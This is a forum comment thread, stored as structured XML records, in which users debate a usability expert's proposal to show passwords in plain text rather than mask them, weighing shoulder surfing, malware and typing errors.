	<htmltext>Dots?  Who the hell has dots?  My unix login prompt cursor <i>doesn't even move</i> when I type the password in; I'd love to have some dots!</htmltext>
<tokenext>Dots ?
Who the hell has dots ?
My unix login prompt cursor does n't even move when I type the password in ; I 'd love to have some dots !</tokentext>
<sentencetext>Dots?
Who the hell has dots?
My unix login prompt cursor doesn't even move when I type the password in; I'd love to have some dots!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472289</id>
	<title>Another expert says...</title>
	<author>Anonymous</author>
	<datestamp>1245924180000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>And I recommend masking passwords... Am I an expert now?</p></htmltext>
<tokenext>And I recommend masking passwords... Am I an expert now ?</tokentext>
<sentencetext>And I recommend masking passwords... Am I an expert now?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28485033</id>
	<title>blocking out passwords is not the biggest problem</title>
	<author>Anonymous</author>
	<datestamp>1246039800000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This guy is flat out wrong.  I have been doing IT in a K - 12 school environment for quite a while.  When it comes to password problems, I have seen it all.</p><p>When someone fails in typing their password, they just retry and get it right the second or third time.  If they still can't get in it is because they forgot their password, never changed their password from the one I gave them initially, have their caps locks on, or have mistyped their user name with a leading or trailing space.  Password blocking is never the problem.</p><p>If you want to make things easier, institute password and user name recovery and code your user name input fields to ignore white-space characters.</p></htmltext>
<tokenext>This guy is flat out wrong .
I have been doing IT in a K - 12 school environment for quite a while .
When it comes to password problems , I have seen it all.When someone fails in typing their password , they just retry and get it right the second or third time .
If they still ca n't get in it is because they forgot their password , never changed their password from the one I gave them initially , have their caps locks on , or have mistyped their user name with a leading or trailing space .
Password blocking is never the problem.If you want to make things easier , institute password and user name recovery and code your user name input fields to ignore white-space characters .</tokentext>
<sentencetext>This guy is flat out wrong.
I have been doing IT in a K - 12 school environment for quite a while.
When it comes to password problems, I have seen it all.When someone fails in typing their password, they just retry and get it right the second or third time.
If they still can't get in it is because they forgot their password, never changed their password from the one I gave them initially, have their caps locks on, or have mistyped their user name with a leading or trailing space.
Password blocking is never the problem.If you want to make things easier, institute password and user name recovery and code your user name input fields to ignore white-space characters.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470945</id>
	<title>But they do recommend willy smacking</title>
	<author>Anonymous</author>
	<datestamp>1245963180000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Imagine your Willy being smacked until it bleeds.</p><p>J.delanoy</p></htmltext>
<tokenext>Imagine your Willy being smacked until it bleeds.J.delanoy</tokentext>
<sentencetext>Imagine your Willy being smacked until it bleeds.J.delanoy</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473919</id>
	<title>Screen scraping</title>
	<author>HunterZ</author>
	<datestamp>1245930840000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Lots of people are knocking TFA's suggestion due to over-the-shoulder vulnerability, but with the proliferation of malware I'd be more worried about malicious software screen scraping an unmasked password.</p></htmltext>
<tokenext>Lots of people are knocking TFA 's suggestion due to over-the-shoulder vulnerability , but with the proliferation of malware I 'd be more worried about malicious software screen scraping an unmasked password .</tokentext>
<sentencetext>Lots of people are knocking TFA's suggestion due to over-the-shoulder vulnerability, but with the proliferation of malware I'd be more worried about malicious software screen scraping an unmasked password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</id>
	<title>Two words</title>
	<author>RollingThunder</author>
	<datestamp>1245962940000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>Shoulder surfing.</p><p>Seriously, is this guy is supposed to be an expert?</p><p>This is like having a fuel efficiency expert tell you to turn the motor off on your car, stick it in neutral, and push it, since it'll get infinite MPG.  Passwords are supposed to be secret.  Usernames aren't as critical.</p></htmltext>
<tokenext>Shoulder surfing.Seriously , is this guy is supposed to be an expert ? This is like having a fuel efficiency expert tell you to turn the motor off on your car , stick it in neutral , and push it , since it 'll get infinite MPG .
Passwords are supposed to be secret .
Usernames are n't as critical .</tokentext>
<sentencetext>Shoulder surfing.Seriously, is this guy is supposed to be an expert?This is like having a fuel efficiency expert tell you to turn the motor off on your car, stick it in neutral, and push it, since it'll get infinite MPG.
Passwords are supposed to be secret.
Usernames aren't as critical.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472085</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245923400000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>There are many situations where "over the shoulder" attacks are simply not possible</i></p><p>A whole host of screen-grabbing malware says hi.</p></htmltext>
<tokenext>There are many situations where " over the shoulder " attacks are simply not possibleA whole host of screen-grabbing malware says hi .</tokentext>
<sentencetext>There are many situations where "over the shoulder" attacks are simply not possibleA whole host of screen-grabbing malware says hi.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471233</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481925</id>
	<title>old stuff</title>
	<author>Tom</author>
	<datestamp>1246029600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Maybe they should've read the research on the topic, some more than five years old.</p><p>While the "think tanks" write bullshit papers, companies like Apple already implement what's been found to be the optimal trade-off: Display the last letter that you just typed for a couple seconds. Turns out that this largely eliminates shoulder-surfing and accidental password disclosure if someone catches a short glimpse of your monitor, and brings typos to almost the same level as normal typing.</p></htmltext>
<tokenext>Maybe they should 've read the research on the topic , some more than five years old.While the " think tanks " write bullshit papers , companies like Apple already implement what 's been found to be the optimal trade-off : Display the last letter that you just typed for a couple seconds .
Turns out that this largely eliminates shoulder-surfing and accidental password disclosure if someone catches a short glimpse of your monitor , and brings typos to almost the same level as normal typing .</tokentext>
<sentencetext>Maybe they should've read the research on the topic, some more than five years old.While the "think tanks" write bullshit papers, companies like Apple already implement what's been found to be the optimal trade-off: Display the last letter that you just typed for a couple seconds.
Turns out that this largely eliminates shoulder-surfing and accidental password disclosure if someone catches a short glimpse of your monitor, and brings typos to almost the same level as normal typing.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472933</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245926520000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>***ing my passwords is to keep my friends and coworkers from ***ing around with my facebook as a prank.</p><p>It does nothing to keep out malicious people bent on ***ing around with my private stuff, but I don't want my friends getting too ***ing curious about my emails.</p></htmltext>
<tokenext>* * * ing my passwords is to keep my friends and coworkers from * * * ing around with my facebook as a prank.It does nothing to keep out malicious people bent on * * * ing around with my private stuff , but I do n't want my friends getting too * * * ing curious about my emails .</tokentext>
<sentencetext>***ing my passwords is to keep my friends and coworkers from ***ing around with my facebook as a prank.It does nothing to keep out malicious people bent on ***ing around with my private stuff, but I don't want my friends getting too ***ing curious about my emails.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471287</id>
	<title>Re:Two words</title>
	<author>nitehawk214</author>
	<datestamp>1245921120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Really.. a website can guarantee that I am not sitting in a coffee shop somewhere using wifi? That they can guarantee that one of my coworkers is not looking over my shoulder helping me work on something? Wow!</p></htmltext>
<tokenext>Really.. a website can guarantee that I am not sitting in a coffee shop somewhere using wifi ?
That they can guarantee that one of my coworkers is not looking over my shoulder helping me work on something ?
Wow !</tokentext>
<sentencetext>Really.. a website can guarantee that I am not sitting in a coffee shop somewhere using wifi?
That they can guarantee that one of my coworkers is not looking over my shoulder helping me work on something?
Wow!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471035</id>
	<title>Um.</title>
	<author>Darkness404</author>
	<datestamp>1245963480000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p> typically, masking passwords doesn't even increase security, but it does cost you business due to login failures</p> </div><p>

Lets see here.... In a school setting (college or otherwise) lets say a computer in the lab breaks. You are a simi-competent CS student and the admin goes over to fix it. He types in the root password, if it was visible you just got root into any computer at the university and could do whatever you wanted. However if it was masked, it wouldn't be that easy. <br> <br>

As for business, what person can't type in 6-10 characters (average length of a password) and can't get it right in 1-5 tries? Really, the only excuse for that is if you aren't using a keyboard and even then things like the iPhone assist you in showing the plain text for a time then blanking it. I see no reason not to mask passwords and thousands of arguments for it.</p></div>
	</htmltext>
<tokenext>typically , masking passwords does n't even increase security , but it does cost you business due to login failures Lets see here.... In a school setting ( college or otherwise ) lets say a computer in the lab breaks .
You are a simi-competent CS student and the admin goes over to fix it .
He types in the root password , if it was visible you just got root into any computer at the university and could do whatever you wanted .
However if it was masked , it would n't be that easy .
As for business , what person ca n't type in 6-10 characters ( average length of a password ) and ca n't get it right in 1-5 tries ?
Really , the only excuse for that is if you are n't using a keyboard and even then things like the iPhone assist you in showing the plain text for a time then blanking it .
I see no reason not to mask passwords and thousands of arguments for it .</tokentext>
<sentencetext> typically, masking passwords doesn't even increase security, but it does cost you business due to login failures 

Lets see here.... In a school setting (college or otherwise) lets say a computer in the lab breaks.
You are a simi-competent CS student and the admin goes over to fix it.
He types in the root password, if it was visible you just got root into any computer at the university and could do whatever you wanted.
However if it was masked, it wouldn't be that easy.
As for business, what person can't type in 6-10 characters (average length of a password) and can't get it right in 1-5 tries?
Really, the only excuse for that is if you aren't using a keyboard and even then things like the iPhone assist you in showing the plain text for a time then blanking it.
I see no reason not to mask passwords and thousands of arguments for it.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474425</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245932640000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I'm curious. How did the woman get physical possession of your card?  Or did you not stick around enough to hit cancel when it asked for another transaction?</p></htmltext>
<tokenext>I 'm curious .
How did the woman get physical possession of your card ?
Or did you not stick around enough to hit cancel when it asked for another transaction ?</tokentext>
<sentencetext>I'm curious.
How did the woman get physical possession of your card?
Or did you not stick around enough to hit cancel when it asked for another transaction?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476723</id>
	<title>Re:hunter2</title>
	<author>six11</author>
	<datestamp>1245945360000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><blockquote><div><p>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</p></div></blockquote><p>Nielsen is not universally revered in HCI (/usability) circles, and we don't really have a Steven Hawking-like figure. He has done some pretty solid work in the past, but that only goes so far. A lot of UI/UX/ practitioners I know don't think highly of his recent stuff. So, [citation needed] is right, but [open mind needed] is as well.</p><p>I love my field, but it is really fluffy---most of what we accept as "true" is really just "things we generally accept or don't want to argue about any more". Like most pundits, Jakob is taking an extreme position to get practitioners to think about alternative methods of designing user interactions.</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field.Nielsen is not universally revered in HCI ( /usability ) circles , and we do n't really have a Steven Hawking-like figure .
He has done some pretty solid work in the past , but that only goes so far .
A lot of UI/UX/ practitioners I know do n't think highly of his recent stuff .
So , [ citation needed ] is right , but [ open mind needed ] is as well.I love my field , but it is really fluffy---most of what we accept as " true " is really just " things we generally accept or do n't want to argue about any more " .
Like most pundits , Jakob is taking an extreme position to get practitioners to think about alternative methods of designing user interactions .</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.Nielsen is not universally revered in HCI (/usability) circles, and we don't really have a Steven Hawking-like figure.
He has done some pretty solid work in the past, but that only goes so far.
A lot of UI/UX/ practitioners I know don't think highly of his recent stuff.
So, [citation needed] is right, but [open mind needed] is as well.I love my field, but it is really fluffy---most of what we accept as "true" is really just "things we generally accept or don't want to argue about any more".
Like most pundits, Jakob is taking an extreme position to get practitioners to think about alternative methods of designing user interactions.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471549</id>
	<title>Re:Two words</title>
	<author>tdandh</author>
	<datestamp>1245921900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Interestingly, ING Direct offers this option for the username/userid field.</p></htmltext>
<tokenext>Interestingly , ING Direct offers this option for the username/userid field .</tokentext>
<sentencetext>Interestingly, ING Direct offers this option for the username/userid field.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472213</id>
	<title>What? It's useful.</title>
	<author>lattyware</author>
	<datestamp>1245923880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>When I have a friend in the room, I'm glad I don't have to send them out to type my password.
<br>
Most people can't track my fingers on a keyboard. They can, on the other hand, read.</htmltext>
<tokenext>When I have a friend in the room , I 'm glad I do n't have to send them out to type my password .
Most people ca n't track my fingers on a keyboard .
They can , on the other hand , read .</tokentext>
<sentencetext>When I have a friend in the room, I'm glad I don't have to send them out to type my password.
Most people can't track my fingers on a keyboard.
They can, on the other hand, read.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109</id>
	<title>Re:hunter2</title>
	<author>rootofevil</author>
	<datestamp>1245920580000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p><div class="quote"><p>Typically, masking passwords doesn't even increase security<nobr> <wbr></nobr>...</p></div><p>[citation desperately needed]</p></div><p>maybe hes referring to the case where people write their now very complex and long passwords (by requirement of the system) down so that they can be remembered properly.</p><p>this a wild, pull it out of my ass guess.  so no snarky retorts.  not that anyone does that on the internet.</p></div>
	</htmltext>
<tokenext>Typically , masking passwords does n't even increase security ... [ citation desperately needed ] maybe hes referring to the case where people write their now very complex and long passwords ( by requirement of the system ) down so that they can be remembered properly.this a wild , pull it out of my ass guess .
so no snarky retorts .
not that anyone does that on the internet .</tokentext>
<sentencetext>Typically, masking passwords doesn't even increase security ...[citation desperately needed]maybe hes referring to the case where people write their now very complex and long passwords (by requirement of the system) down so that they can be remembered properly.this a wild, pull it out of my ass guess.
so no snarky retorts.
not that anyone does that on the internet.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479169</id>
	<title>Nielsen must not be very bright.</title>
	<author>Anonymous</author>
	<datestamp>1246009680000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Someone must say this brilliant man the masking is used to avoid OTHER PEOPLE to spy on your password as you type it. The point in having a password is not usability; is security. And if someone is dumb enough to register the same password wrongly twice, then he deserves it.</p><p>Actually he's probably angry because he did just that. He could ask mom to help confirm if he typed twice. Or even type in notepad, confirm, then paste.</p><p>Btw I'm not "Anonymous Coward", I'm just lazy to open up an account.</p></htmltext>
<tokenext>Someone must say this brilliant man the masking is used to avoid OTHER PEOPLE to spy on your password as you type it .
The point in having a password is not usability ; is security .
And if someone is dumb enough to register the same password wrongly twice , then he deserves it.Actually he 's probably angry because he did just that .
He could ask mom to help confirm if he typed twice .
Or even type in notepad , confirm , then paste.Btw I 'm not " Anonymous Coward " , I 'm just lazy to open up an account .</tokentext>
<sentencetext>Someone must say this brilliant man the masking is used to avoid OTHER PEOPLE to spy on your password as you type it.
The point in having a password is not usability; is security.
And if someone is dumb enough to register the same password wrongly twice, then he deserves it.Actually he's probably angry because he did just that.
He could ask mom to help confirm if he typed twice.
Or even type in notepad, confirm, then paste.Btw I'm not "Anonymous Coward", I'm just lazy to open up an account.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471359</id>
	<title>Keep passwords simple and easy to remember</title>
	<author>cockpitcomp</author>
	<datestamp>1245921300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Most users will pick an easy to remember password that they are less likely to fat finger. Making the mask optional would help. Users rarely surf in public.</htmltext>
<tokenext>Most users will pick an easy to remember password that they are less likely to fat finger .
Making the mask optional would help .
Users rarely surf in public .</tokentext>
<sentencetext>Most users will pick an easy to remember password that they are less likely to fat finger.
Making the mask optional would help.
Users rarely surf in public.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471555</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245921900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If they can see your screen they probably can see something ELSE...</p><p>I will let you think about it...</p><p>Your keyboard...</p><p>I have done this.  It is a 'little' tricky but you can watch people type things in and just remember the keystrokes.  It is even easier if the person can not type very well.</p></htmltext>
<tokenext>If they can see your screen they probably can see something ELSE...I will let you think about it...Your keyboard...I have done this .
It is a 'little ' tricky but you can watch people type things in and just remember the keystrokes .
It is even easier if the person can not type very well .</tokentext>
<sentencetext>If they can see your screen they probably can see something ELSE...I will let you think about it...Your keyboard...I have done this.
It is a 'little' tricky but you can watch people type things in and just remember the keystrokes.
It is even easier if the person can not type very well.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478149</id>
	<title>Re:Two more words for Nielsen: Security Cameras</title>
	<author>Elias Ross</author>
	<datestamp>1245957420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>If someone can install a security camera in your house, they likely have physical access to your machine. What do you think is more likely: Keyboard sniffer or security camera?</p><p>For me who works at home, it's nice idea to be able to see your password. And even if you're in an office, who's really going to try and steal your password? Do you worry when you leave your wallet or car keys at your desk that a coworker is going to steal your credit cards or vehicle?</p><p>It might just encourage users to chose a longer or more complicated password that's more difficult to hack. Security always has trade-offs.</p><p>If you want real security, you should use two or three factor authentication anyway. Too bad the web doesn't readily allow for it.</p></htmltext>
<tokenext>If someone can install a security camera in your house , they likely have physical access to your machine .
What do you think is more likely : Keyboard sniffer or security camera ? For me who works at home , it 's nice idea to be able to see your password .
And even if you 're in an office , who 's really going to try and steal your password ?
Do you worry when you leave your wallet or car keys at your desk that a coworker is going to steal your credit cards or vehicle ? It might just encourage users to chose a longer or more complicated password that 's more difficult to hack .
Security always has trade-offs.If you want real security , you should use two or three factor authentication anyway .
Too bad the web does n't readily allow for it .</tokentext>
<sentencetext>If someone can install a security camera in your house, they likely have physical access to your machine.
What do you think is more likely: Keyboard sniffer or security camera?For me who works at home, it's nice idea to be able to see your password.
And even if you're in an office, who's really going to try and steal your password?
Do you worry when you leave your wallet or car keys at your desk that a coworker is going to steal your credit cards or vehicle?It might just encourage users to chose a longer or more complicated password that's more difficult to hack.
Security always has trade-offs.If you want real security, you should use two or three factor authentication anyway.
Too bad the web doesn't readily allow for it.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472853</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Al Dimond</author>
	<datestamp>1245926220000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Right, because in practice all the people that want your password are skilled at watching keyboards, or have physical access to your computer when you're not around and have the know-how to install a keylogger or sniff EMF or whatever.  Now, to be fair, in most places I've worked password blanking wouldn't have done much; I've never had my own locking office and my colleagues have usually been programmers.  Also in most of these places I didn't have access to much that any of them wouldn't.</p><p>But in my parents' offices?  You're telling me that password blanking does nothing to protect an accountant or lawyer from a co-worker with a grudge but rather little technical knowledge.  Give the average office worker physical access to the machine for hours with nobody watching and he'll be foiled by the password.  Door and window locks protect only against lousy criminals, but most criminals are pretty lousy -- padlocks are pretty weak, too, and they work great against the vast majority of people that weren't planning to steal your stuff until they just saw it out (an exception is bikes, which are expensive, parked in open and predictable places, and easy to get away on, and thus have both a crowd of dedicated thieves and a decent selection of tough locks and chains).</p></htmltext>
<tokenext>Right , because in practice all the people that want your password are skilled at watching keyboards , or have physical access to your computer when you 're not around and have the know-how to install a keylogger or sniff EMF or whatever .
Now , to be fair , in most places I 've worked password blanking would n't have done much ; I 've never had my own locking office and my colleagues have usually been programmers .
Also in most of these places I did n't have access to much that any of them would n't.But in my parents ' offices ?
You 're telling me that password blanking does nothing to protect an accountant or lawyer from a co-worker with a grudge but rather little technical knowledge .
Give the average office worker physical access to the machine for hours with nobody watching and he 'll be foiled by the password .
Door and window locks protect only against lousy criminals , but most criminals are pretty lousy -- padlocks are pretty weak , too , and they work great against the vast majority of people that were n't planning to steal your stuff until they just saw it out ( an exception is bikes , which are expensive , parked in open and predictable places , and easy to get away on , and thus have both a crowd of dedicated thieves and a decent selection of tough locks and chains ) .</tokentext>
<sentencetext>Right, because in practice all the people that want your password are skilled at watching keyboards, or have physical access to your computer when you're not around and have the know-how to install a keylogger or sniff EMF or whatever.
Now, to be fair, in most places I've worked password blanking wouldn't have done much; I've never had my own locking office and my colleagues have usually been programmers.
Also in most of these places I didn't have access to much that any of them wouldn't.But in my parents' offices?
You're telling me that password blanking does nothing to protect an accountant or lawyer from a co-worker with a grudge but rather little technical knowledge.
Give the average office worker physical access to the machine for hours with nobody watching and he'll be foiled by the password.
Door and window locks protect only against lousy criminals, but most criminals are pretty lousy -- padlocks are pretty weak, too, and they work great against the vast majority of people that weren't planning to steal your stuff until they just saw it out (an exception is bikes, which are expensive, parked in open and predictable places, and easy to get away on, and thus have both a crowd of dedicated thieves and a decent selection of tough locks and chains).</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473753</id>
	<title>I don't get these 'experts'</title>
	<author>/dev/trash</author>
	<datestamp>1245930120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I also don't get the amount of money they're paid to say things like "password blanking is soooo confusing to noobs".  Yeah every thing is til you take time to learn it.  This country is going down the shitter fast.</p></htmltext>
<tokenext>I also do n't get the amount of money they 're paid to say things like " password blanking is soooo confusing to noobs " .
Yeah every thing is til you take time to learn it .
This country is going down the shitter fast .</tokentext>
<sentencetext>I also don't get the amount of money they're paid to say things like "password blanking is soooo confusing to noobs".
Yeah every thing is til you take time to learn it.
This country is going down the shitter fast.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211</id>
	<title>Why not a compromise?</title>
	<author>Slipped\_Disk</author>
	<datestamp>1245920820000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>1</modscore>
	<htmltext>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER.  That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.<br>
<br>
As a compromise measure I propose stealing something from Apple's playbook: The iPhone password entry interface.  The last character typed is visible for 2-3 seconds, everything else is masked (and backspacing doesn't reveal characters, just makes the dots go away).  The design doesn't suck, and the security compromise isn't as bad as "leave the password on-screen for everyone to see" like the article is suggesting.</htmltext>
<tokenext>What TFA is suggesting is probably one of the dumbest ideas I 've heard since... EVER. That said , the dots are a usability issue -- I 've got plenty of otherwise very smart users who screw up passwords constantly .
As a compromise measure I propose stealing something from Apple 's playbook : The iPhone password entry interface .
The last character typed is visible for 2-3 seconds , everything else is masked ( and backspacing does n't reveal characters , just makes the dots go away ) .
The design does n't suck , and the security compromise is n't as bad as " leave the password on-screen for everyone to see " like the article is suggesting .</tokentext>
<sentencetext>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER.  That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.
As a compromise measure I propose stealing something from Apple's playbook: The iPhone password entry interface.
The last character typed is visible for 2-3 seconds, everything else is masked (and backspacing doesn't reveal characters, just makes the dots go away).
The design doesn't suck, and the security compromise isn't as bad as "leave the password on-screen for everyone to see" like the article is suggesting.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481665</id>
	<title>Re:its not a problem for me</title>
	<author>michelcolman</author>
	<datestamp>1246028640000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Wait... your password is fluffybunnies too?!</htmltext>
<tokenext>Wait... your password is fluffybunnies too ?
!</tokentext>
<sentencetext>Wait... your password is fluffybunnies too?
!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471969</id>
	<title>I disagree</title>
	<author>m1ss1ontomars2k4</author>
	<datestamp>1245923160000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>And you would too if you worked around other people, or if there's even a remote possibility of someone being around when you type in a password.</htmltext>
<tokenext>And you would too if you worked around other people , or if there 's even a remote possibility of someone being around when you type in a password .</tokentext>
<sentencetext>And you would too if you worked around other people, or if there's even a remote possibility of someone being around when you type in a password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479381</id>
	<title>Anonymous Coward</title>
	<author>Anonymous</author>
	<datestamp>1246011840000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>With all due respect to Mr. Nielsen, I do question his position on this.  I've worked in the network security field for 12+ years now.  Most recently, because of a family illness, I've spent way too much time visiting hospitals.  During this time, I've seen many nurses and other health care providers log in, with a password reset required, in the presence of myself and others in the room.  If my mind wasn't concentrated on my ailing family member, it would had been very easy for me to grab that password (without being masked) and have access to every patient's EMR (Electronic Medical Record) in the system.  I do recognize that this may be costing to some organizations, however,  isn&#226;(TM)t it still a critical in some, i.e.; HIPPA compliant environments?</p></htmltext>
<tokenext>With all due respect to Mr. Nielsen , I do question his position on this .
I 've worked in the network security field for 12 + years now .
Most recently , because of a family illness , I 've spent way too much time visiting hospitals .
During this time , I 've seen many nurses and other health care providers log in , with a password reset required , in the presence of myself and others in the room .
If my mind was n't concentrated on my ailing family member , it would had been very easy for me to grab that password ( without being masked ) and have access to every patient 's EMR ( Electronic Medical Record ) in the system .
I do recognize that this may be costing to some organizations , however , isn   ( TM ) t it still a critical in some , i.e .
; HIPPA compliant environments ?</tokentext>
<sentencetext>With all due respect to Mr. Nielsen, I do question his position on this.
I've worked in the network security field for 12+ years now.
Most recently, because of a family illness, I've spent way too much time visiting hospitals.
During this time, I've seen many nurses and other health care providers log in, with a password reset required, in the presence of myself and others in the room.
If my mind wasn't concentrated on my ailing family member, it would had been very easy for me to grab that password (without being masked) and have access to every patient's EMR (Electronic Medical Record) in the system.
I do recognize that this may be costing to some organizations, however,  isnâ(TM)t it still a critical in some, i.e.
; HIPPA compliant environments?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477321</id>
	<title>who is the usability expert, around here?</title>
	<author>Keith\_Beef</author>
	<datestamp>1245950040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I had to explain ONCE and ONCE ONLY to my eight year old son and to my six year old daughter, that the password shows as black dots so that nobody can read the password off the screen. It is such a simple idea, that they both understood it straight away.

</p><p>Add to this, the fact that almost EVERYBODY (all the people I've watched, plus myself) will watch where their fingers are on the keyboard when entering a password, and you reach the conclusions that displaying the password on the screen as it is being typed:
</p><ol>
<li>does not help the person typing the password,</li>
<li>increases the chance of over-the-shoulder password discovery.</li>
</ol><p>Ergo, the status quo should be kept, until change is proven necessary.

K.</p></htmltext>
<tokenext>I had to explain ONCE and ONCE ONLY to my eight year old son and to my six year old daughter , that the password shows as black dots so that nobody can read the password off the screen .
It is such a simple idea , that they both understood it straight away .
